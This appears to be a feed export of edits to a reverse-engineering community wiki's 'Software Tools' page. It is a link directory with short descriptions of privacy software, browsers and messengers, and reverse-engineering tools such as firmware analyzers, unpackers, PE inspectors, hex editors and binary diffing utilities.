*[http://repo.hu/projects/pcb-rnd/ pcb-rnd] - is a free/open source, flexible, modular Printed Circuit Board editor. For design of professional and hobby boards. Is feature-rich and compatible. Has a long history, fast paced development, and big plansand is part of the coralEDA ecosystem.&lt;br /&gt;
&lt;br /&gt;
=====Computer Aided Design [[Wikipedia:Computer-aided_design|(CAD)]] Mechanical Engineering=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.freecad.org/ FreeCAD] - is an open-source parametric 3D modeler made primarily to design real-life objects of any size. Parametric modeling allows you to easily modify your design by going back into your model history and changing its parameters.&lt;br /&gt;
&lt;br /&gt;
*[https://openscad.org/ OpenSCAD] - is software for creating solid 3D CAD objects. It is free software and available for Linux/UNIX, MS Windows and Mac OS X.&lt;br /&gt;
&lt;br /&gt;
*[https://brlcad.org/ BRL-CAD] - is a powerful open source cross-platform solid modeling system that includes interactive geometry editing, high-performance ray-tracing for rendering and geometric analysis, a system performance analysis benchmark suite, geometry libraries for application developers, and more than 30 years of active development.&lt;br /&gt;
&lt;br /&gt;
*[https://solvespace.com/index.pl SolveSpace] - is a free (GPLv3) parametric 3d CAD tool. Modeling 3d parts, modeling 2d parts, 3d-printed parts, preparing CAM data, mechanism design, plane and solid geometry.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
====Other software====&lt;br /&gt;
&lt;br /&gt;
=====Display Driver Utilities (Windows)=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/lostindark/DriverStoreExplorer Driver Store Explorer (RAPR)] - is a tool used to manage the Windows driver store, a repository of driver packages that Windows uses to install and update hardware drivers. It helps users list, add, install, delete, and export driver packages, especially those from third-party vendors.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/Wagnard/display-drivers-uninstaller DDU] - is a driver removal utility that can help you completely uninstall AMD/NVIDIA/Intel graphics card drivers and packages from your system, without leaving leftovers behind (including registry keys, folders and files, and driver store).&lt;br /&gt;
&lt;br /&gt;
*[https://www.techpowerup.com/nvcleanstall/ NVCleanstall] - is a free utility from TechPowerUp that allows you to customize your NVIDIA GeForce driver installation. It enables you to remove unnecessary components and install only the drivers you need, potentially optimizing your system performance and minimizing &amp;quot;bloatware&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/GSDragoon/RadeonSoftwareSlimmer Radeon Software Slimmer] - is a utility to trim down the bloat with Radeon Software for AMD GPUs on Microsoft Windows.&lt;br /&gt;
&lt;br /&gt;
*[https://forums.guru3d.com/threads/nvslimmer-nvidia-driver-slimming-utility.423072/ NVSlimmer] - is a third-party utility created by uKER and available on guru3d.com that allows users to remove unwanted components from NVIDIA graphics driver installations, effectively &amp;quot;trimming&amp;quot; down the install base. It's not an official Nvidia utility.&lt;br /&gt;
&lt;br /&gt;
=====Host Based Firewall [Windows FOSS]=====&lt;br /&gt;
*[https://github.com/tnodir/fort Fort Firewall] - is a very practical firewall that allows you to manage your privacy and security in Windows simply and flexibly. This open-source tool is a perfect alternative to the standard Windows firewall, giving you a lot of customizable features so you can work with your files and programs more comfortably.&lt;br /&gt;
&lt;br /&gt;
=====Web Browsing=====&lt;br /&gt;
*[https://www.mozilla.org/firefox/ Mozilla Firefox] - is a free, open source web browser developed by the Mozilla Foundation and Mozilla Corporation in 2004. The Firefox web browser can be used with Windows, Mac and Linux operating systems, as well as Android and iOS mobile devices.&lt;br /&gt;
&lt;br /&gt;
::Extensions &amp;amp; Configurations&lt;br /&gt;
:::*[https://github.com/hackademix/noscript NoScript] - The popular NoScript Security Suite browser extension.&lt;br /&gt;
:::*[https://github.com/ChrisAntaki/disable-webrtc-firefox WebRTC block] - WebRTC leaks your actual IP addresses from behind your VPN, by default. With this extension you can disable it.&lt;br /&gt;
:::*[https://github.com/arkenfox/user.js/ user.js] - Firefox privacy, security and anti-tracking: a comprehensive user.js template for configuration and hardening.&lt;br /&gt;
:::*[https://github.com/yokoffing/Betterfox Betterfox] - Firefox speed, privacy, and security: a user.js template for configuration. Your favorite browser, but better.&lt;br /&gt;
:::*[https://github.com/gorhill/uBlock uBlock] - Help users neutralize privacy-invading ads CPU and memory-efficient.&lt;br /&gt;
:::*[https://github.com/sereneblue/chameleon Chameleon] - is a WebExtension port of the popular Random Agent Spoofer. Spoofs a lot of client fingering techniques and adds security.&lt;br /&gt;
:::*[https://github.com/EFForg/privacybadger Privacy Badger] - is a browser extension that automatically learns to block invisible trackers. PB is made by the leading digital rights nonprofit EFF to stop companies from spying on you.&lt;br /&gt;
&lt;br /&gt;
*[https://www.torproject.org/ Tor Browser] - [[Wikipedia:Tor_(network)|Tor]] (The Onion Router) is a network that anonymizes web traffic to provide truly private web browsing. The Tor Browser hides your IP address and browsing activity by redirecting web traffic through a series of different routers known as nodes.&lt;br /&gt;
&lt;br /&gt;
*[https://guardianproject.info/apps/org.torproject.android/ Orbot for Android] -  is a free proxy app that empowers other apps to use the internet more securely. Orbot uses Tor to encrypt your Internet traffic and then hides it by bouncing through a series of computers around the world. Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities.&lt;br /&gt;
&lt;br /&gt;
======Public Networks======&lt;br /&gt;
&lt;br /&gt;
*[https://www.torproject.org/ [[Wikipedia:Tor_(netwerk)|Tor]]] - is an open-source privacy network that enables anonymous web browsing. The worldwide Tor computer network uses secure, encrypted protocols to ensure that users' online privacy is protected.&lt;br /&gt;
&lt;br /&gt;
*[https://geti2p.net/ The Invisible Internet Project [[Wikipedia:I2P|(I2P)]]] - is a fully encrypted private network layer. It protects your activity and location. Every day people use the network to connect with people without worry of being tracked or their data being collected.&lt;br /&gt;
&lt;br /&gt;
*[https://www.freenet.de/ FreeNet] - is a peer-to-peer platform for censorship-resistant, anonymous communication. It uses a decentralized distributed data store to keep and deliver information, and has a suite of free software for publishing and communicating on the Web without fear of censorship.&lt;br /&gt;
&lt;br /&gt;
*[https://zeronet.io/ ZeroNet] - Open, free and uncensorable websites, using Bitcoin cryptography and BitTorrent network · We believe in open, free, and uncensored network.&lt;br /&gt;
&lt;br /&gt;
*[https://lokinet.org/ Lokinet] - is an onion-router that lets you access the internet anonymously. Built on LLARP, the fastest onion-routing protocol in the world.&lt;br /&gt;
&lt;br /&gt;
*[https://nymtech.net/ Nym] - protect internet traffic by routing it through a decentralised mixnet that can be accessed anonymously using zk-nyms.&lt;br /&gt;
&lt;br /&gt;
=====Email Clients / Email Encryption Standards=====&lt;br /&gt;
*[https://www.thunderbird.net/ Mozilla ThunderBird] - is a free, open-source, cross-platform application for managing email, news feeds, chat, and news groups. It is a local email application, meaning it installs and runs as a client on your device, being rather than browser or web-based. [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq FAQ How to implement OpenPGP in Thunderbird].&lt;br /&gt;
&lt;br /&gt;
*[https://www.openpgp.org/ OpenPGP] - is the most widely used email encryption standard. It is defined by the OpenPGP Working Group of the Internet Engineering Task Force (IETF) as a Proposed Standard in RFC 4880. OpenPGP was originally derived from the PGP software, created by Phil Zimmermann.&lt;br /&gt;
&lt;br /&gt;
*[https://www.gnupg.org/ GnuPG] - is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command line tool with features for easy integration with other applications.&lt;br /&gt;
&lt;br /&gt;
*[https://wiki.gnome.org/Apps/Evolution Evolution] - is a personal information management application that provides integrated mail, calendaring and address book functionality. Check the Privacy Policy sub-page for a general information about user data usage. [https://riseup.net/en/email/clients/evolution FAQ How to implement OpenPGP in Evolution].&lt;br /&gt;
&lt;br /&gt;
*[https://neomutt.org/ NeoMutt] - is a command line mail reader (or MUA ). It's a fork of Mutt with added features.&lt;br /&gt;
&lt;br /&gt;
=====Chat Applications / Platforms=====&lt;br /&gt;
*[https://www.teamspeak.com/ TeamSpeak] - is a VoIP application for audio communication between users via a chat channel, similar to a video meeting. Cross-platform with military-grade security, lag-free performance, privacy and complete control.&lt;br /&gt;
*[https://github.com/RetroShare/RetroShare RetroShare] - is a Free and Open Source cross-platform, Friend-2-Friend and secure decentralised communication platform.&lt;br /&gt;
*[https://github.com/JFreegman/toxic Toxic] - is a Tox-based P2P messenger that provides end-to-end encrypted communications without the use of centralized servers. It supports text messaging, file sharing, 1-on-1 voice and video calls, private audio conferences, public and private text group chats.&lt;br /&gt;
*[https://www.jabber.org/ Jabber] - is a original messaging service based on [https://xmpp.org/ XMPP] and has been continuously offered for free since 1999.&lt;br /&gt;
::XMPP clients &amp;amp; extensions&lt;br /&gt;
:::*[https://xmpp.org/software/ XMPP client list] - is a list of XMPP clients composed by XMPP itself.&lt;br /&gt;
:::*[https://otr.cypherpunks.ca/ Off-the-Record Messaging (OTR) for XMPP] - is a cryptographic protocol that provides encryption for instant messaging conversations. OTR uses a combination of AES symmetric-key algorithm with 128 bits key length, the Diffie–Hellman key exchange with 1536 bits group size, and the SHA-1 hash function.&lt;br /&gt;
:::*[https://omemo.im/ OMEMO.IM] is a free, secure XMPP-based chat client available for Android and Windows that utilizes the OMEMO (Multi-End Message and Object) end-to-end encryption protocol.&lt;br /&gt;
:::*[https://xmpp.org/extensions/xep-0384.html XEP-0384: OMEMO Encryption] defines an end-to-end encryption protocol for XMPP messaging that uses double-ratchet and key-exchange techniques to securely encrypt one-to-one and group chats across multiple devices.&lt;br /&gt;
*[https://getsession.org/ Session] - Session is an end-to-end encrypted messenger that minimises sensitive metadata, designed and built for people who want absolute privacy and freedom from any form of surveillance.&lt;br /&gt;
*[https://github.com/briar Briar] - is a messaging app designed for activists, journalists, and anyone else who needs a safe, easy and robust way to communicate. Unlike traditional messaging apps, Briar doesn't rely on a central server - messages are synchronized directly between the users' devices.&lt;br /&gt;
*[https://matrix.org/ Matrix] - is an open network for secure, decentralised communication.&lt;br /&gt;
*[https://discord.com/ Discord] - is a voice, video and text communication service used by over a hundred million people to hang out and talk with their friends and communities.&lt;br /&gt;
::Discord client advice&lt;br /&gt;
:::*1. Stop using the installed electron PC based version. Use the web version.&lt;br /&gt;
:::*2. Android stock client is spoiled with rubbish code slowing down your SoC and sending loads of analytics, use [https://github.com/Aliucord/Aliucord Aliucord] instead (but carefully read the readme.md, ToS issue).&lt;br /&gt;
&lt;br /&gt;
=====File Archiver Utilities=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.7-zip.org/ 7-Zip]  - is a free and open source file archiver.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/M2Team/NanaZip NanaZip] - is a free and open source file archiver intended for the modern Windows experience.&lt;br /&gt;
&lt;br /&gt;
*[https://peazip.github.io/ PeaZip] - is a free and open source file archiver, similar to WinRar, WinZip, and 7-Zip.&lt;br /&gt;
&lt;br /&gt;
=====Disk Encryption Software=====&lt;br /&gt;
&lt;br /&gt;
*[https://guardianproject.info/archive/luks/ Linux Unified Key Setup (LUKS)] - The Linux Unified Key Setup (LUKS) is a disk encryption specification created by Clemens Fruhwirth in 2004 and originally intended for Linux. LUKS implements a platform-independent standard on-disk format for use in various tools&lt;br /&gt;
&lt;br /&gt;
*[https://www.veracrypt.fr/code/VeraCrypt/ VaraCrypt] - VeraCrypt is free open-source disk encryption software for Windows, Mac OS X and Linux. Support for on-the-fly encryption [[Wikipedia:Disk_encryption|(OTFE)]].&lt;br /&gt;
&lt;br /&gt;
=====Image Manipulation Tools=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.gimp.org/ Gimp] - is the official website of the GNU Image Manipulation Program (GIMP). GIMP is a cross-platform image editor available for GNU/Linux, macOS, Windows and more operating systems. It is free software, you can change its source code and distribute your changes.&lt;br /&gt;
&lt;br /&gt;
*[https://www.getpaint.net/ Paint.net] - is image and photo editing software for PCs that run Windows. It features an intuitive and innovative user interface with support for layers, unlimited undo, special effects, and a wide variety of useful and powerful tools. An active and growing online community provides friendly help, tutorials, and plugins.&lt;br /&gt;
&lt;br /&gt;
=====Video Editing Software / 3D Creation / Dec, Enc, Transcode, etc / Media Players=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.blackmagicdesign.com/products/davinciresolve DaVinci Resolve] - is the world’s only solution that combines editing, color correction, visual effects, motion graphics and audio post production all in one software tool! Its elegant, modern interface is fast to learn and easy for new users, yet powerful for professionals.&lt;br /&gt;
&lt;br /&gt;
*[https://shotcut.org/ Shotcut] - is a free, Open Source, cross-platform video editor for Windows, Mac and Linux. Major features include support for a wide range of formats; no import required meaning native timeline editing; Blackmagic Design support for input and preview monitoring; and resolution support to 4k.&lt;br /&gt;
&lt;br /&gt;
*[https://www.openshot.org/nl/ OpenShot] - is a free, Open Source video editor for Linux, Mac, and Windows. We designed OpenShot to be an easy to use, quick to learn, and surprisingly powerful video editor. Easily cut, slice, and edit any video or film.&lt;br /&gt;
&lt;br /&gt;
*[https://www.blender.org/ Blender] - is the free and open source 3D creation suite. It supports the entirety of the 3D pipeline—modeling, rigging, animation, simulation, rendering, compositing and motion tracking, even video editing and game creation.&lt;br /&gt;
&lt;br /&gt;
*[https://ffmpeg.org/ FFMPEG (Command line interface to convert different formats)] - FFmpeg is the leading multimedia framework, able to decode, encode, transcode, mux, demux, stream, filter and play pretty much anything that humans and machines have created. It supports the most obscure ancient formats up to the cutting edge.&lt;br /&gt;
&lt;br /&gt;
*[https://handbrake.fr/features.php HandBrake] - is an Open Source video transcoder available for Linux, Mac, and Windows. Everyone can use HandBrake to make videos for free. HandBrake is a post-production tool. Its primary purpose is to convert videos from supported source formats to MP4 or MKV format.&lt;br /&gt;
&lt;br /&gt;
*[https://www.videolan.org/ VLC Player] - VLC Media Player (also known as VLC) is a free, open source multimedia player developed by VideoLAN Organization. It is one of the oldest (released for the first time in February 2001) free, portable, cross-platform multimedia player. You can use it to play all popular multimedia files and also DVDs, CDs, VCDs and other streaming protocols.&lt;br /&gt;
&lt;br /&gt;
=====Video Recording and Live Streaming=====&lt;br /&gt;
&lt;br /&gt;
*[https://obsproject.com/ OBS (Open Broadcaster Software)] - is free and Open Source software for video recording and live streaming.&lt;br /&gt;
&lt;br /&gt;
*[https://streamlabs.com/ StreamLabs] - is free live streaming and recording software for Twitch, YouTube, and more for Windows or Mac.&lt;br /&gt;
&lt;br /&gt;
====Search engine (self-hosted &amp;amp; open-source)====&lt;br /&gt;
*[https://github.com/searxng/searxng SearXNG] - is a free and open-source metasearch engine that prioritizes user privacy. It works by aggregating results from various search engines, such as Google, Bing, and DuckDuckGo, without tracking or profiling users. Essentially, it acts as a privacy-respecting proxy for your searches. &lt;br /&gt;
&lt;br /&gt;
*[https://github.com/neon-mmd/websurfx websurfx] - is a free and open-source metasearch engine written in Rust, designed to provide a fast, secure, and privacy-respecting alternative to search engines like SearX. It aggregates results from other search engines without displaying ads, focusing on speed, security, and user privacy. &lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mwmbl/mwmbl Mwmbl] - is a non-profit, open source search engine where the community determines the rankings. We aim to be a replacement for commercial search engines such as Google and Bing.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/yacy/yacy_search_server YaCy] - is a free, open-source, peer-to-peer (P2P) search engine that operates without a central authority. It differs from traditional search engines by allowing users to create their own local or global indexes and share them with other users, creating a decentralized network.&lt;br /&gt;
&lt;br /&gt;
====Social Network / Fediverse (self-hosted &amp;amp; open-source)====&lt;br /&gt;
&lt;br /&gt;
*[https://joinmastodon.org/ Mastodon] - is a free and open-source software for running self-hosted social networking services. It has microblogging features similar to Twitter, which are offered by a large number of independently run nodes, known as instances or servers, each with its own code of conduct, terms of service, privacy policy, privacy options, and content moderation policies. [https://github.com/mastodon/mastodon Github repo].&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/pixelfed/pixelfed PixelFed] - is a decentralized, open-source social media platform focused on photo and video sharing, designed as an alternative to Instagram. It utilizes the ActivityPub protocol, allowing users to interact with accounts on other Pixelfed servers as if they were on the same platform.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/movim/movim Movim] - is a federated blogging and chat platform that acts as a web frontend for the XMPP protocol.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/emilebosch/awesome-fediverse Big fediverse list] - is a curated list of more decentralized social networks.&lt;br /&gt;
&lt;br /&gt;
====Privacy-focused Software Directory====&lt;br /&gt;
&lt;br /&gt;
*[https://prism-break.org/ prism-break.org] -  is a website that provides a curated list of free and open-source software (FOSS) alternatives to proprietary, surveillance-prone services. It aims to help users opt out of global data surveillance programs—like PRISM, XKeyscore, and Tempora—by promoting privacy-respecting technology for operating systems, browsers, and communication tools.&lt;br /&gt;
&lt;br /&gt;
==Education==&lt;br /&gt;
    &lt;br /&gt;
:[[:Literature|See the literature wiki page for all the resources.]]&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Software_Tools&amp;diff=3309</id>
		<title>Software Tools</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Software_Tools&amp;diff=3309"/>
		<updated>2026-04-04T17:57:16Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: add Privacy-focused Software Directory&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:Software_wiki_banner.png|frameless|1280x300px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disassemblers, decompilers, software development tools, pcb development suites, cryptographic tools, and other reverse engineering software. If you used it while reverse engineering, list it here!&lt;br /&gt;
==Tool Index==&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====RF Signals Analysis====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/jopohl/urh Universal Radio Hacker] - tool to analyze and extract data from SDR-captured radio signals (especially pilots, [[Wikipedia:ISM_radio_band|ISM RF]] devices, etc). See youtube for tutorials and examples.&lt;br /&gt;
&lt;br /&gt;
*[https://www.gnuradio.org/ GNU Radio]  - toolkit that provides signal processing blocks to implement software-defined radios and signal processing systems.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/cjcliffe/CubicSDR CubicSDR] - is a cross-platform Software-Defined Radio application which allows you to navigate the radio spectrum and demodulate any signals you might discover.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/audacity/audacity Audacity] - is a audio editor that can be used to cleanup the radio waves captured by a [[Wikipedia:Software-defined_radio|SDR]] or Software Defined Radio. (Example: Start Audacity -&amp;gt; Import –&amp;gt; Raw Data -&amp;gt; Radio Wave File)&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Firmware Analysis====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ReFirmLabs/binwalk binwalk]  - Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/attify/firmware-analysis-toolkit FAT] - is a toolkit built in order to help security researchers analyze and identify vulnerabilities in IoT and embedded device firmware.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/e-m-b-a/emba EMBA] - is designed as the central firmware analysis tool for penetration testers and product security teams. It supports the complete security analysis process starting with firmware extraction, doing static analysis and dynamic analysis via emulation and finally generating a web report.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rampageX/firmware-mod-kit Firmware Modification Kit] - is a collection of scripts and utilities to extract and rebuild linux based firmware images.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/craigz28/firmwalker Firmwalker] - is a script for searching the extracted firmware file system for goodies!&lt;br /&gt;
&lt;br /&gt;
====Setup Extractors / Overlay Unpackers / Virtualization Wrappers====&lt;br /&gt;
&lt;br /&gt;
*[https://innounp.sourceforge.net/ innounp] - the Inno Setup Unpacker.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/Bioruebe/UniExtract2 Universal Extractor 2 (UniExtract2)] -  is a tool designed to extract files from any type of extractable file.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/activescott/lessmsi lessmsi] - a tool to view and extract the contents of an Windows Installer (.msi) file.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/crackinglandia/fuu FUU] - [F]aster [U]niversal [U]npacker.&lt;br /&gt;
&lt;br /&gt;
=====Themida Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ergrelet/themida-unmutate themida-unmutate] - is a static deobfuscator for Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sodareverse/TDE TDE] - is a devirtualization engine for Themida. Supported FISH VMA versions: 2.2.5.0, 2.2.6.0, 2.2.7.0.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ergrelet/unlicense unlicense] - is a dynamic unpacker and import fixer for Themida/WinLicense 2.x and 3.x mostly used for malware-analysis.&lt;br /&gt;
&lt;br /&gt;
=====VMProtect Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
======VMProtect 2======&lt;br /&gt;
&lt;br /&gt;
*[https://git.back.engineering/vmp2/ vmp2] - Resources provided by Back Engineering Labs regarding VMProtect 2 Reverse Engineering (x64 PE Only).&lt;br /&gt;
*vmemu (VMProtect 2 Virtual Machine Handler Emulation)&lt;br /&gt;
*vmassembler (VMProtect 2 Virtual Instruction Assembler)&lt;br /&gt;
*vmprofiler (VMProtect 2 Virtual Machines Profiler Library)&lt;br /&gt;
*vmprofiler-cli (VMProtect 2 CLI Virtual Machine Information Displayer)&lt;br /&gt;
*vmhook (VMProtect 2 Virtual Machine Hooking Library)&lt;br /&gt;
*vmprofiler-qt (VMProtect 2 Qt Virtual Instruction Inspector)&lt;br /&gt;
*um-hook (VMProtect 2 Usermode Virtual Instruction Hook Demo)&lt;br /&gt;
*vmdevirt (VMProtect Devirtualization)&lt;br /&gt;
&lt;br /&gt;
======VMProtect 3======&lt;br /&gt;
&lt;br /&gt;
*[https://git.back.engineering/vmp3/ vmp3] - Resources provided by Back Engineering Labs regarding VMProtect 3 Reverse Engineering (x64 PE Only).&lt;br /&gt;
*vmdevirt (VMProtect 3 Static Devirtualization)&lt;br /&gt;
*vmprofiler (VMProtect 3 Virtual Machines Profiler Library)&lt;br /&gt;
*vmemu (VMProtect 3 Virtual Machine Handler Emulation)&lt;br /&gt;
&lt;br /&gt;
=====Code Virtualizer (Oreans Technologies)=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/pakt/decv devc] - ia s decompiler for Code Virtualizer 1.3.8 (Oreans).&lt;br /&gt;
*[https://gdtr.wordpress.com/2012/10/03/decv-a-decompiler-for-code-virtualizer-by-oreans/ decv] - [blog post] a decompiler for Code Virtualizer by Oreans.&lt;br /&gt;
*[https://github.com/67-6f-64/AntiOreans-CodeDevirtualizer AntiOreans-CodeDevirtualizer] - is a proof-of-concept devirtualization engine for Themida/Oreans-CodeDevirtualizer.&lt;br /&gt;
&lt;br /&gt;
=====Enigma Protector=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mos9527/evbunpack evbunpack] - is a Enigma Virtual Box Unpacker. Supported versions: 11.00, 10.70, 9.70, and 7.80.&lt;br /&gt;
&lt;br /&gt;
======OllyDbg Scripts======&lt;br /&gt;
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%201.90%20-%203.xx%20Alternativ%20Unpacker%20v1.0.txt Enigma Protector 1.90–3.xx Unpacker]&lt;br /&gt;
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%204.xx%20VM%20API%20Fixer%20v0.5.0.txt Enigma Protector 4.xx VM API Fixer]&lt;br /&gt;
&lt;br /&gt;
=====Generic Code Virtualizer=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/jnraber/VirtualDeobfuscator VirtualDeobfuscator] - is a reverse engineering tool for virtualization wrappers.&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Toolkit AIO====&lt;br /&gt;
=====Windows‑focused=====&lt;br /&gt;
*[https://github.com/Jakiboy/ReVens ReVens] - is a Windows-based Reverse Engineering Toolkit &amp;quot;All-In-One&amp;quot;, Built for Security (Malware analysis, Penetration testing) &amp;amp; Educational purposes.&lt;br /&gt;
*[https://github.com/mentebinaria/retoolkit retoolkit] - is a collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems.&lt;br /&gt;
*[https://github.com/byte2mov/re-kit-2.0 re-kit 2.0] - is a reverse engineering toolkit made for fighting malware and analyzing programs.&lt;br /&gt;
*[https://github.com/zer0condition/ReverseKit ReverseKit] - is a comprehensive toolkit designed to aid reverse engineers in the process of dynamic RE.&lt;br /&gt;
&lt;br /&gt;
=====Android‑focused=====&lt;br /&gt;
*[https://github.com/RevEngiSquad/revengi-app RevEngi] - is a all-in-one toolkit for reverse engineering: Smali Grammar, DexRepair, Flutter Analysis and much more...&lt;br /&gt;
&lt;br /&gt;
====Binary PE Analysis / Editor (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://web.archive.org/web/20210331144912/https://protectionid.net/ ProtectionID] - Great little tool to scan a Windows binary payload for overlays and packers.  [[Media:ProtectionId.690.December.2017.zip]] [https://www.virustotal.com/gui/file/26c54eb376183d508ee129531728f9e01d30f0df29d7621f390e8f0ea6a1c79c/community VT link], pw: recessim.com&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/horsicq/Detect-It-Easy Detect-It-Easy] - abbreviated &amp;quot;DIE&amp;quot; is a program for determining types of files. &amp;quot;DIE&amp;quot; is a cross-platform application, apart from Windows version there are also available versions for Linux and Mac OS.&lt;br /&gt;
&lt;br /&gt;
*[https://www.mitec.cz/exe.html MiTeC Portable Executable Reader/Explorer] - is a tool that reads and displays executable file properties and structures. It is compatible with PE32 (Portable Executable), PE32+ (64bit), NE (Windows 3.x New Executable) and VxD (Windows 9x Virtual Device Driver) file types. .NET executables are supported too.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ExeinfoASL/ASL ExeInfoPe] - is a tool that can detect packers, compilers, protectors, .NET obfuscators, PUA applications.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/hasherezade/pe-bear PE-bear] - is a Portable Executable reversing tool with a friendly GUI using the Capstone Engine and is Open Source!&lt;br /&gt;
&lt;br /&gt;
*[https://ntcore.com/?page_id=388 CFF Explorer] - is a PE editor called CFF Explorer and a process viewer with a lot of features.&lt;br /&gt;
&lt;br /&gt;
*[https://web.archive.org/web/20220331063153/http://www.rdgsoft.net/ RDG Packer Detector] - is a detector for packers, cryptors, compilers, installers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/petoolse/petools/ PE Tools] - is a portable executable (PE) manipulation toolkit.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/zedxxx/rccextended RccExtended] - is a resource compiler and decompiler for Qt binaries (files with the .rcc extension).&lt;br /&gt;
&lt;br /&gt;
====Hex Editors====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/WerWolv/ImHex ImHex] - is a Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM.&lt;br /&gt;
&lt;br /&gt;
*[https://mh-nexus.de/en/hxd/ HxD] - is a carefully designed and fast hex editor which, additionally to raw disk editing and modifying of main memory (RAM), handles files of any size.&lt;br /&gt;
&lt;br /&gt;
*[https://www.x-ways.net/winhex/ WinHex] - is in its core a universal hexadecimal editor, particularly helpful in the realm of computer forensics, data recovery, low-level data processing, and IT security.&lt;br /&gt;
&lt;br /&gt;
*[https://malcat.fr/index.html MalCat] - is a feature-rich hexadecimal editor / disassembler for Windows and Linux targeted to IT-security professionals. Inspect more than 40 binary file formats, dissassemble and decompile different CPU architectures, extract embedded files and scan for Yara signatures or anomalies in a fast and easy-to-use graphical interface.&lt;br /&gt;
&lt;br /&gt;
====Pattern Matching / Pattern Searching====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/VirusTotal/yara Yara] - is a pattern matching swiss knife in the IT Security Researchers branch.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/BurntSushi/ripgrep ripgrep (rg)] - is a line-oriented search tool that recursively searches the current directory for a regex pattern. By default, ripgrep will respect gitignore rules and automatically skip hidden files/directories and binary files.&lt;br /&gt;
&lt;br /&gt;
*[https://linux.die.net/man/1/grep grep] - searches the named input FILEs (or standard input if no files are named, or if a single hyphen-minus (-) is given as file name) for lines containing a match to the given PATTERN. By default, grep prints the matching lines.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/stefankueng/grepWin grepWin] -  is a simple yet powerful search and replace tool which can use regular expressions to do its job. This allows to do much more powerful searches and replaces.&lt;br /&gt;
&lt;br /&gt;
*[https://astrogrep.sourceforge.net/  AstroGrep] - is a Microsoft Windows grep utility. Grep is a UNIX command-line program which searches within files for keywords. AstroGrep supports regular expressions, versatile printing options, stores most recently used paths and has a &amp;quot;context&amp;quot; feature which is very nice for looking at source code.&lt;br /&gt;
&lt;br /&gt;
====Comparison Tools (Binary differences)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/joxeankoret/diaphora Diaphora] - is the most advanced Free and Open Source program diffing tool.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/google/bindiff BinDiff] - is an open-source comparison tool for binary files to quickly find differences and similarities in disassembled code.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/clearbluejar/ghidriff Ghidriff] - is a command-line binary diffing tool that uses Ghidra to identify differences between two binaries.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/quarkslab/qbindiff QBinDiff] - is an experimental binary diffing tool addressing the diffing as a Network Alignement Quadratic Problem.&lt;br /&gt;
&lt;br /&gt;
*[https://book.rada.re/tools/radiff2/binary_diffing.html radiff2] - is a binary diffing utility that is part of the radare2 framework.&lt;br /&gt;
&lt;br /&gt;
